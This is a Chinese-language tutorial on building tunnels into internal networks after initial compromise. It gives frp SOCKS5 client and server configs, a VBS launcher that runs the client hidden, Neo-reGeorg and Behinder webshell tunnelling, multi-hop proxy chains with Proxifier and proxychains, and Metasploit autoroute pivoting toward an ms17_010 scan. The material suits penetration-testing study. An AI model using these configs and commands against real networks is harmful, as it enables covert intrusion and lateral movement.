内网隧道

内网隧道

在内网渗透时,一个WebShell或CobaltStrike、Metasploit上线等,只是开端,更多是要内网横向移动,扩大战果,打到核心区域。但后渗透的前提是需要搭建一条通向内网的“专属通道”,才能进一步攻击。可实战中因为网络环境不同,所利用的方式就不同。

0x01、目标出网

1、frp(socks5)

#frpc.ini
[common]
server_addr = 服务器地址
server_port = 50201
token = 123456

[socks_proxy]
type = tcp
remote_port = 50202
plugin = socks5
use_encryption = true 
use_compression = true
#socks5口令
#plugin_user = testtest
#plugin_passwd = testtest
#frps.ini
[common]
bind_addr =0.0.0.0
bind_port =50201
token = 123456
#frpc.bat
frpc.exe -c frpc.ini

#frpc.vbs
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c frpc.bat",vbhide

use_encryption = true 启用加密 [通信内容加密传输,有效防止流量被拦截]

use_compression = true 启用压缩 [传输内容进行压缩,有效减小传输的网络流量,加快流量转发速度,但会额外消耗一些CPU资源]

进行隐藏,然后连接[socks_proxy]

2、CS之 SMB beacon

官网介绍:SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。

内网隧道

内网隧道

具体可查看该文章 Cobalt Strike使用SMB的使用与用途等稍后有时间再细讲cs详细使用

0x02、目标不出网

目标机网络中可能有防火墙、网闸等,只允许http单向出,无法正常访问互联网,用上述socks方法是行不通的,只能用http代理进行渗透。

1、Neo-reGeorg (加密)

下载地址:https://github.com/L-codes/Neo-reGeorg

python neoreg.py -k cmd -l 0.0.0.0 -p 10081 -u http://192.168.144.211/neo-tunnel.php

使用Neo-reGeorg后,数据包已被加密传输。

Neo-reGeorg使用方法Neo的一些Tips

2、冰蝎 (开socks5)

冰蝎的数据包传输是加密的,本身也具备socks代理功能,但传输过程中存在丢包情况。这里同样是利用metasploit探测ms17_010漏洞,结果显示不存在。当不设置代理探测时,实际漏洞是存在的。

0x03、隔离网络(多级代理)

内网渗透中,会遇到隔离网络,更多时候是逻辑上的隔离,突破的办法就是拿到route可达的跳板机 (多张网卡、运维机等)的权限,建立一层二级代理、三级代理…

1、frp

现拿到一台双网卡内网服务器权限,可以用frp建立通道,这台服务器既是服务端也是客户端。

内网隧道

2、proxifier

用frp建立好后,结合proxifier添加两条代理:外网socks、内网socks,之后创建代理链 。(注意代理顺序)

内网隧道

设置代理规则,选择对应代理。

内网隧道

二层代理成功,内网隔离机445探测开放。

内网隧道

3、Proxychains

命令行代理神器proxychains,设置二层代理、socks口令。(注意代理顺序)

内网隧道

联动metasploit,ms17_010探测,可以看到代理链的传输过程。

内网隧道

4、Metasploit

针对metasploit的利用,只要sessions中的route可达,就可以直接进行多层网络渗透,更加方便。但主session掉,均掉!

在获取目标一个sessions 后,可以查看IP段信息并自动添加路由表。

msf5 exploit(multi/handler) > sessions 1
meterpreter > run get_local_subnets
meterpreter > run autoroute -p
meterpreter > run post/multi/manage/autoroute
meterpreter > run autoroute -p
meterpreter > background

内网隧道

上述是在meterpreter权限中添加,或当知道目标路由表信息时,可直接添加。

msf5 exploit(multi/handler) > route add 172.20.20.0/24 1 //session id 1
msf5 exploit(multi/handler) > route

可在metasploit继续渗透,或开启一个socks,挂载其他工具上多层穿透。

上一篇:代理服务器有几种类型?如何划分使用?


下一篇:70 内网安全-域横向内网漫游Socks代理隧道技术